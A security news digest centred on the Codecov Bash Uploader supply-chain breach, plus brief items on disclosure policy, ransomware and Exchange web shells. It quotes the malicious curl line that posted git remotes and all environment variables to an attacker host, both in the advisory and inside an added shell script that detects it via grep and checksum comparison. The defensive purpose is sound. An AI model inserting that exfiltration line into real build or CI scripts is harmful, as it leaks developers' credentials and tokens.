Security Week 16: Supply Chain Attack at Codecov
The company's statement does not yet contain all the technical details of the breach, but it is known that the attackers exploited a flaw in the process used to build Codecov's Docker images and through it were able to modify the Bash Uploader script. The modified script was then delivered to customers, except those using a special version of the product without cloud functionality. The code was first altered on January 31st: for at least 2.5 months, an essentially malicious script was distributed from Codecov's servers. The access keys to the cloud development tools of affected customers have very likely leaked.
Codecov clients are advised to check their installed copy of the script for the following line:
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://REDACTED/upload/v2 || true
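The check above amounts to searching a downloaded copy of the uploader for the exfiltration line. The following POSIX shell script is an added example, not Codecov's own tooling: it scans a local file for the two distinctive fragments of that line and, separately, compares the file's SHA-256 against a known-good value. The two uploader files it scans are constructed stand-ins written to a temporary directory (not the real script), and KNOWN_GOOD is taken from the clean stand-in so the demo runs offline; in practice that value comes from the vendor's published hash.

```shell
#!/bin/sh
# Added example (not Codecov's code): detect the exfiltration line named in
# the advisory inside a local copy of an uploader script, and verify the
# file's SHA-256 against a known-good value.

# Returns 0 when the indicator is present (file is tampered), 1 when absent.
# Fixed-string matching (-F) means the shell metacharacters in the indicator
# need no regex escaping.
scan_uploader() {
    file="$1"
    grep -qF 'git remote -v' "$file" && grep -qF 'ENV $(env)' "$file"
}

# Prints the SHA-256 of FILE; falls back to shasum where sha256sum is absent.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Returns 0 when FILE hashes to EXPECTED, 1 otherwise.
verify_checksum() {
    [ "$(sha256_of "$1")" = "$2" ]
}

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
CLEAN="$WORK/uploader-clean.sh"
TAMPERED="$WORK/uploader-tampered.sh"

# Constructed stand-in for a legitimate uploader (not the real Bash Uploader).
cat > "$CLEAN" <<'EOF'
#!/usr/bin/env bash
set -e
echo "uploading coverage report"
curl -X POST --data-binary @coverage.out "$url/upload/v4" || true
EOF

# Same stand-in with the line quoted in the advisory inserted (host REDACTED).
cat > "$TAMPERED" <<'EOF'
#!/usr/bin/env bash
set -e
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://REDACTED/upload/v2 || true
echo "uploading coverage report"
curl -X POST --data-binary @coverage.out "$url/upload/v4" || true
EOF

# Placeholder for the vendor-published hash: derived from the clean stand-in
# here only so the example is self-contained.
KNOWN_GOOD=$(sha256_of "$CLEAN")

# Human-readable verdict for one file.
report() {
    if scan_uploader "$1"; then
        echo "TAMPERED: $1 contains the exfiltration line"
    else
        echo "clean:    $1 (indicator not found)"
    fi
    if verify_checksum "$1" "$KNOWN_GOOD"; then
        echo "          checksum matches known-good value"
    else
        echo "          checksum MISMATCH against known-good value"
    fi
}

report "$CLEAN"
report "$TAMPERED"
```

The grep scan only catches this particular modification; the checksum comparison catches any change to the file, which is why pinning a downloaded script to a published hash (or vendoring a reviewed copy) is the more general control for a `curl | bash` style installer.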
The consequences of the breach are still difficult to assess: this incident can be described as a supply-chain attack squared. A tool used by software developers was compromised, which means there is a chance that the code of Codecov's own clients could in turn have been modified. Potential victims include major companies such as Atlassian, P&G and GoDaddy. In addition, the Bash Uploader code is open source, distributed under a free license and incorporated into other projects for software developers.
Codecov continues to investigate to find out exactly how the access keys to the source code fell into the attackers' hands. The company also promises to implement monitoring tools to prevent unauthorized code modification in the future. Apparently, the company's clients will have to conduct a similar audit of their own.
What else happened
The Google Project Zero team has updated its vulnerability disclosure rules. Now, when a serious vulnerability is discovered, the vendor is given not only 90 days to develop a fix but, in some cases, an additional 30 days to distribute the patch. Next year, however, Project Zero plans to shrink the 90-day patch development window. And last week, in violation of all ethical standards, an exploit for an unpatched vulnerability in Google Chrome was made public.
Dutch transport company Bakker Logistiek fell victim to a ransomware attack. The company's IT systems were down for some time, and a shortage of cheese in a local supermarket chain was the collateral damage.
The U.S. Department of Justice reported the forced removal of web shells from compromised Microsoft Exchange mail servers, carried out without the owners' knowledge.
Meanwhile, the April Microsoft patch set closed four more vulnerabilities in Exchange, which, according to the vendor, had not been exploited before the patch was released. An overview of all the important patches is available at BleepingComputer…
Another patch from the Microsoft set closes a zero-day vulnerability in the Desktop Window Manager, discovered by Kaspersky Lab specialists.
The Register's journalists write about a study of pirated copies of Microsoft Office and Adobe Photoshop. The result will surprise no one: the pirated copies contained malware, mostly engaged in stealing user data. The only relatively new detail is the theft of the Monero cryptocurrency.